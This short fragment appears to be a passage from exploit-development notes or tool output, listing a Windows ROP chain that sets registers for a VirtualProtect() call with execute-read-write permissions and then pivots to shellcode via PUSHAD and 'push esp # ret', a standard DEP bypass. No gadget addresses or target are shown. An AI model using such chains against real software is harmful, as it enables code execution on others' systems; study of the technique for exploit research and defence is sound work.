* POP EBP # RETN skip 4 bytes POP EBX # RETN 0x00000400-> ebx POP EDX # RETN 0x00000040-> edx POP ECX # RETN Writable location POP EDI # RETN RETN (ROP NOP) POP ESI # RETN JMP [EAX] POP EAX # RETN ptr to VirtualProtect() PUSHAD # ADD AL,0EF # RETN ptr to 'push esp # ret